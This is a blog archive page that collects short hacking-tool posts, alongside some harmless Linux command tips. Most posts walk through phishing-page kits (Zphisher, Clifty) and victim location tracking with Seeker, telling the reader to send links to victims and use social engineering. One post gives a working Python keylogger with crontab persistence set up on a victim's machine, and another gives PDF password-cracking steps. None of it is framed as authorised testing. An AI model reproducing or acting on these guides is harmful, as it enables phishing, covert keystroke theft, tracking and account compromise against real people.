Posts

Showing posts from February, 2024

Zphisher - Phising Attack page creation github - Social Media, cloud etc...

Image
  Step:1 clone from github git clone https://github.com/htr-tech/zphisher.git Step:2 Run Zphisher.sh bash zphisher.sh All information will store in auth directory. Step:3 Send the first url to victim.

Ahmyth RAT - Remote Administration Tool Github

Linux Commands part - 2

Image
$ file images.png output- Dimensions file type 8 bit color map $less file.txt this command shows overwhelm text in one screen at a time. $sudo apt install imagemagick $identify images.png Gives the properties of the images etc... $mkdir -p /home/Desktop/maverick/Documents/MyDocuments/ This command gonna create sub-directory. $ mkdir -p Soumya/Documents/Kali.pdf/ | touch mk.txt Find $ $ find /home -name puppies.jpg $ $ find /home -type d -name MyFolder $help $man $whatis ls Oneliner help this command will explain the command in one line. 18. alias Sometimes typing commands can get really repetitive, or if you need to type a long command many times, it’s best to have an alias you can use for that. To create an alias for a command you simply specify an alias name and set it to the command. $ alias foobar='ls -la' Now instead of typing ls -la, you can type foobar and it will execute that command, pretty neat stuff. Keep in mind that this command won't save your alias after rebo

Linux Commands - Toilet and Terminal Banner Customization with names

Toilet Linux Commands command | toilet [options] ls | toilet Changing Font: echo "Hello World" | toilet -f term echo "Hello World" | toilet -f mono12 Fonts Lists:- block big lean mini script shadow slant small smblock smscript echo "Hello World" | toilet -F metal Changing Font Size: echo "Hello World" | toilet -f term --filter border -w 80 Changing Colors: echo "Hello World" | toilet --gay Text Alignment: echo "Hello World" | toilet --gay -F border Adding Borders: echo "Hello World" | toilet --gay -F border --gay Rotating Text: echo "Hello World" | toilet -F border --gay -r Applying Filters: echo "Hello World" | toilet --gay --filter flip Configuring  terminal for name banner Here's how you can do it for some common shells: Bash: If you're using Bash, you can add the command to your ~/.bashrc file. Open ~/.bashrc in a text editor: bash Copy code nano ~/.bashrc Add the following line at t

Auto tor - change your ip in seconds

Image
  1.Clone from github 2.python3 install.py 3.python3 auto_tor.py Q.IT will ask for after how many seconds you wanted to change your ip. Q.Then it will ask the how much times you wanted to change your ip. For infinite times give 0. #vpn #ipaddress #changeyouripaddress #autotor

Clifty - A tool for phishing and information gathering

Image
  Things you can do: 1.Login             A. About 2.Camera          B. Request site 3.Microphone  C. Report Issue 4.Location        D. Download All Sites 5.Clipboard      E. Logs 6.Pattern           F. Update 7.IP address     G. Open Discussions #INFORMATIONGATHERING #informationgathering #location #camera #tools #clipboard #pattern #ipaddress #login #microphone

Keylogger - A python script to scrap keystrokes in a text file.

 Step:1 Install pynput  $pip3 install pynput Step:2 Python Code from pynput import keyboard def keyPressed ( key ): print ( str ( key )) with open ( "Keystrokes.txt" , 'a' ) as logKey : try : char = key .char logKey . write ( char ) except AttributeError : # More specific exception handling print ( "Error: Key has no character representation" ) if __name__ == "__main__" : listener = keyboard . Listener ( on_press = keyPressed ) # Capitalized 'Listener' listener . start () input () After that a file will generate name Keystrokes.txt Now If a victim is using linux so what I did to start the storing keystrokes in text file when a victim boot the machine so i add the path to crontab. $crontab -e @reboot /home/maverick/Desktop/PRO/Python/Keylogger.py Or @reboot python3 /home/maverick/Documents/Python/Keylogger.py Or @reboot /home/maverick/Desktop/Pro/Python/D

Sublist3r - Subdomain Finder

Image
 Step-1 Search: Sublis3r Github Step-2 Clone the github repository Step-3 Install the requirements. Step-4 python3 sublist3r.py -h (help) -d (domain) https://google.com/ #tools #TOOLS #TOOLs #informationgathering #reccoinnasance

PDFCRACK - A TOOL TO CRACK PDF FILES PASSWORD

 Hydra is a powerful tool for performing online password attacks against various network protocols, but it's not typically used for cracking PDF file passwords. However, you can use other tools like "pdfcrack" or "qpdf" along with a wordlist to crack PDF passwords. Here's a basic guide on how to use "pdfcrack": 1. **Install pdfcrack**: You can typically install pdfcrack using your package manager. For example, on Debian/Ubuntu, you can use:    ```    sudo apt-get install pdfcrack    ``` 2. **Prepare a Wordlist**: You need a list of possible passwords to try. You can create one yourself or use existing wordlists. There are many available online. 3. **Run pdfcrack**: The basic syntax for pdfcrack is:    ```    pdfcrack -f <PDF-file> -w <wordlist>    ```    Replace `<PDF-file>` with the path to your PDF file and `<wordlist>` with the path to your wordlist file.    For example:    ```    pdfcrack -f example.pdf -w rockyou.txt  

Seeker - A tool to find the location of victim and more info. A information Gathering TOOls

Step:- 1 clone from GitHub Google - seeker github Step:-2 ngrok authtoken YOUR_TOKEN Step:-3 Terminal No. 1 python3 seeker.py Choose one of the option and when victim clicks the link it will show all the info about their. IPs - Operators Google Maps Location Latitude Longitude and more Terminal No. 2 ./ngrok http 8080 copy the url from terminal no. 2 and send it to victim and click them by the technique of social engineering. Make sure your shorten the url. #tools #informationgathering